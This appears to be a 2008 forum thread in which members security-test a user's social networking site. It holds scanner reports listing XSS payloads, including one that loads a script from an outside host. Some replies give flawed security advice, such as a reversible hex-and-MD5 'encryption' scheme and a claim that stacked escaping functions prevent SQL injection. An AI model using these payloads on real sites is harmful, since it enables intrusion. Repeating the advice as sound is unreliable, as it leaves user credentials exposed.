homechickie Posted September 3, 2008 Share Posted September 3, 2008 Hi everyone I would be grateful if someone could test my site for any security errors. I have a few other people testing, but they have no clue as far as security goes lol. http://www.myfangroups.com I have created a username & password for testing purposes for anyone who does not want to sign up. Username: test Password: TestAccount1 Thanks so much! Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/ Share on other sites More sharing options...
darkfreaks Posted September 3, 2008 Share Posted September 3, 2008 Input Type Password Autocomplete Enabled Password type input named pass from unnamed form with action ./process.php has autocomplete enabled. An attacker with local access could obtain the cleartext password from the browser cache. The impact of this vulnerability Possible sensitive information disclosure How to fix this vulnerability The password autocomplete should be disabled in sensitive applications. To disable autocomplete, you may use a code similar to < INPUT TYPE="password" AUTOCOMPLETE="off" > User credentials are sent in clear text The impact of this vulnerability A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. How to fix this vulnerability Because user credentials usually are considered sensitive information, it is recommended to be sent to the server over an encrypted connection. Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632359 Share on other sites More sharing options...
homechickie Posted September 3, 2008 Author Share Posted September 3, 2008 Thanks Something strange though... I have no file named process.php, not sure why that would show up? Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632363 Share on other sites More sharing options...
darkfreaks Posted September 3, 2008 Share Posted September 3, 2008 lol sorry thats my mistake i forgot to edit that out, i put it as a general error in my scanner. Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632374 Share on other sites More sharing options...
Coreye Posted September 3, 2008 Share Posted September 3, 2008 Cross Site Scripting(XSS): You can submit ">code when adding blog entries. http://www.myfangroups.com/members/test&act=blog&id=10 Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632505 Share on other sites More sharing options...
tmbrown Posted September 3, 2008 Share Posted September 3, 2008 Do you have a class handling the home.php event driven page? If not how are you handling this? As far as the user credentials go... If you are unable to accommodate SSL into the site then another option (in which i prefer) is to write a method/function depending on your structure to encrypt the values onsubmit. to be able to truly encrypt you will need ajax to run a processor page to change the actual values on the onchange event. however here is a php example of encryption and decryption. <?php public static function Encrypt( $str ){ $cipher = md5( 15698975412356843216841 ); $str = bin2hex( $str ); $hash = $str . $cipher; return $hash; } public static function Decrypt( $hash ){ $cipher = md5( 15698975412356843216841 ); $str = substr( $hash,0,strpos( $hash,$cipher ) ); $hash = pack( "H*",$str ); return $hash; } ?> In Encrypt the string or integer you pass in will be encrypted and a hash will be returned, in Decrypt you pass a hash that has been encrypted and it will return its decrypted value. This is by no means full-proof. However md5 is virtually a one way encryption and if they knew where the hex started then they could decrypt it, other than that you'd be fairy safe. Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632614 Share on other sites More sharing options...
darkfreaks Posted September 3, 2008 Share Posted September 3, 2008 uhm that only works for passwords if you want to make variables safe just use strip_tags,trim, mysql_real_escape_string these will avoid SQL injection and Cross Site Scripting Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632776 Share on other sites More sharing options...
tmbrown Posted September 3, 2008 Share Posted September 3, 2008 Technically it'll work for any string or integer value you want to pass into it, but i understand what you're saying. As far as an immediate change you will have to use some javascript to convert the values before the actual form is submitted. to do this you will need to do something similar to: <script> function convPost(){ var elem = document.forms['yourformid'].elements; for (i = 0; i < elem.length; i++) { elem[i].value = '<?php Class::Encrypt(elem[i].value);?>'; } } </script> Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632782 Share on other sites More sharing options...
darkfreaks Posted September 3, 2008 Share Posted September 3, 2008 that will crypt the variable and decrypt it honestly only time you need it , is when putting a variable inside a link in which case i use htmlspecialchars() so people can't inject code into the link. Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632798 Share on other sites More sharing options...
darkfreaks Posted September 3, 2008 Share Posted September 3, 2008 <?php function clean($text){ $text=strip_tags(mysql_real_escape_string(trim(htmlspecialchars($text)))); return $text; }?> you can call clean whenever you need to sanitize a variable Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632836 Share on other sites More sharing options...
tmbrown Posted September 3, 2008 Share Posted September 3, 2008 I understand what you're saying, but i offered my 2 cents worth for if SSL was unavailable. You are right and I do use these methods for url variables, however it has much potential, but for simplicity sake I agree with your method for encoding. Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-632876 Share on other sites More sharing options...
darkfreaks Posted October 13, 2008 Share Posted October 13, 2008 XSS Injection: The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <IMG DYNSRC="javascript:alert('XSS')"> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> Also you might want to check your login and groups for XSS and SQL injection Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/#findComment-663645 Share on other sites More sharing options...
Recommended Posts